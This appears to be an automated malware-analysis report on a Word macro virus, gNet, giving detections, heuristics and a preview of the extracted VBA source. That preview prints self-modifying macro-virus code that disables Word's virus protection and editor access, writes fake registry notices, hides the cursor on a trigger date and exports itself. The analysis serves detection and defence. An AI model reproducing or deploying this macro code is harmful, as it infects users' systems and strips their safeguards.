MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as the gNet Macro Virus by ClamAV and its VBA code explicitly states 'This is gNet Macro Virus version 2'. The AutoOpen macro executes a Shell() call and attempts to modify system settings by writing to registry keys, specifically 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption' and 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText'. These actions suggest an attempt to disable security features and potentially prepare the system for a secondary payload.
Heuristics 6
-
ClamAV: Doc.Trojan.Gnet-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Gnet-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17757 bytes |
SHA-256: 25531e05d723b2f91270d393b1fa140e11d9ead794badbfdd728f91680f3a341 |
|||
|
Detection
ClamAV:
Doc.Trojan.Gnet-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "gNet"
' This is gNet Macro Virus version 2
' (c) 1999 by ksg
' astigmatiZm virus group
' www.astigmatiZm.cjb.net
' rename this file to gNet.bas and import it in MS Words Visual Basic Editor to activate
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
'----------------------
' WM97.gNet version 2
' ---------------------
' (c) by KSG [ AMACC ]
' ---------------------
' [ Astig Matizm ]
'
Sub main()
On Error Resume Next
Set ksg = Application.VBE.ActiveVBProject.VBComponents: Set tre = CodeModule
Set cb = CommandBars: Set cbvisible = Visible: Set cbProtection = Protection
k$ = "Fa": s$ = "lse"
WordBasic.DisableAutoMacros 0
cb("Visual Basic").cbvisible = False
cb("Visual Basic").Enabled = False
cb("Visual Basic").cbProtection = msoBarNoChangeVisible
cb("Visual Basic").cbProtection = msoBarNoCustomize
cb("Tools").Controls("Macro").Delete
cb("Tools").Controls("Customize...").Delete
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
AtiveDocument.ReadOnlyRecommended = False
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "Windows Critical Error"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "This version of Windows is not Y2K ready. Please Upgrade Today! www.microsoft.com"
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = k$ + s$
.VirusProtection = k$ + s$
End With
Randomize
ActiveLines = ksg("gNet").tre.CountOfLines
If ActiveLines > 300 Then
With ksg("gNet").tre
For TheLine = 1 To .CountOfLines
If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
Next TheLine
End With
Else
With ksg("gNet").tre
vsize = Int(Rnd * 10)
For loop1 = 1 To vsize
pstring = ""
PolyLines = .CountOfLines
RndLine = Int(Rnd * PolyLines) + 1
psize = Int(Rnd * 39) + 1
For loop2 = 1 To psize
pstring = pstring & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Next loop2
.InsertLines RndLine, "Rem " & pstring
Next loop1
End With
End If
If Day(Now()) = 10 And Month(Now()) = 9 Then Call Payload
End Sub
Sub Payload()
On Error Resume Next
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "W 9 7 M . g N e t b y k s g" & vbCr & "" & vbCr & " www.astigmatiZm.cjb.net "
.Heading = "astigmatiZm VX Team"
.Animation = msoAnimationSearching
.Show
End With
Assistant.Visible = False
While ShowCursor(False) >= 0
Wend
End Sub
Sub Routine()
On Error Resume Next
Set amt = NormalTemplate.VBProject.VBComponents
Set ksg = Application.VBE.ActiveVBProject.VBComponents: Set tre = CodeModule
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = (Rnd * 0)
.VirusProtection = (Rnd * 0)
.ConfirmConversions = (Rnd * 0)
End With
ksg("gNet").Export "C:\gNet.sys"
For x = 1 To amt.Co
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.